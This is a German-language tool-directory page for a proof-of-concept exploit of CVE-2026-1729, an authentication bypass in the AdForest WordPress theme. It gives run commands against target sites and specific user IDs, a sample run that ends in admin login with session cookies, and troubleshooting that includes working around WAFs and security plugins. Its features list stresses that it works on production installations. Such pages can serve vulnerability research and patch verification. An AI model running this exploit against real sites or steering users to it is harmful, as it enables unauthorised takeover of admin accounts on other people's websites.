Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/ninjazan420/cve-2026-1729-poc-adforest-wordpress-authentication-bypass
Authentifizierung & AutorisierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubninjazan420/cve-2026-1729-poc-adforest-wordpress-authentication-bypass

CVE-2026-1729-PoC-AdForest-WordPress-Authentication-Bypass

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

Repository anzeigen
3vor 7 MonatenNoch nicht geprüft

Das AdForest-Theme für WordPress ist in allen Versionen einschließlich 6.0.12 anfällig für Authentifizierungsumgehung. Dies liegt daran, dass das Plugin die Identität eines Benutzers vor der Authentifizierung über die Funktion 'sb_login_user_with_otp_fun' nicht ordnungsgemäß überprüft. Dies ermöglicht es nicht authentifizierten Angreifern, sich anzumelden, einschließlich Admin

Teilen

CVE-2026-1729 - AdForest WordPress Authentifizierungs-Bypass PoC

Beschreibung

Einfacher Proof of Concept für CVE-2026-1729 (PoC) - Authentifizierungs-Bypass-Schwachstelle im AdForest WordPress-Theme. Authored by f3ds cr3w est 2oo2 blog

Funktionen

  • ✅ Direkter Admin-Zugriff ohne Anmeldedaten
  • ✅ Funktioniert auf produktiven WordPress-Installationen
  • ✅ Keine Docker-Einrichtung erforderlich
  • ✅ Einfache Befehlszeilenschnittstelle
  • ✅ Sitzungspersistenz

Voraussetzungen

  • Python 3.6+
  • requests Bibliothek

Installation

root@kitploit:~
pip install requests

Verwendung

Grundlegende Verwendung

root@kitploit:~
python poc/exploit.py https://target-site.com

Bestimmte Benutzer-ID anvisieren

root@kitploit:~
python poc/exploit.py https://target-site.com --user-id 2

Beispiele

root@kitploit:~
# Exploit default admin (user ID 1)
python poc/exploit.py https://example.com

# Exploit specific user account
python poc/exploit.py https://example.com --user-id 5

# Test multiple targets
python poc/exploit.py https://site1.com
python poc/exploit.py https://site2.com --user-id 3

Ausgabe

root@kitploit:~
CVE-2026-1729 - AdForest WordPress Authentication Bypass
=======================================================
WARNING: For authorized testing only!
=======================================================
[+] Target: https://example.com
[+] Targeting user ID: 1
[+] Sending exploit to: https://example.com/wp-admin/admin-ajax.php
[+] SUCCESS! Admin access granted
[+] Admin URL: https://example.com/wp-admin/
[+] Session cookies: {'wp-settings-time-1': '1234567890', 'wordpress_logged_in_...': '...'}
[+] Logged in as: admin

🎯 Exploit completed successfully!
You now have admin access to the WordPress site.

Was nach dem Exploit passiert

  1. Admin-Zugriff: Sie erhalten vollen Admin-Zugriff auf /wp-admin/
  2. Sitzungspersistenz: Der Exploit behält Sitzungscookies bei
  3. Benutzerinformationen: Zeigt an, welches Konto kompromittiert wurde
  4. Direkter Zugriff: Sie können sofort auf das WordPress-Admin-Dashboard zugreifen

Hinweise

  • Rechtmäßige Nutzung: Nur auf Websites verwenden, die Ihnen gehören oder für die Sie ausdrückliche Erlaubnis zum Testen haben
  • Anforderungen an das Ziel: Die Website muss das AdForest-Theme installiert haben
  • Erfolgsrate: Funktioniert auf verwundbaren Versionen des AdForest-Themes
  • Keine Installation: Es muss nichts auf dem Zielserver installiert werden

Fehlerbehebung

Wenn der Exploit fehlschlägt:

  1. Überprüfen, ob das AdForest-Theme installiert ist
  2. Prüfen, ob die Website WordPress verwendet
  3. Sicherstellen, dass die Theme-Version verwundbar ist
  4. Keine WAF oder Sicherheits-Plugins blockieren die Anfrage
Tool herunterladen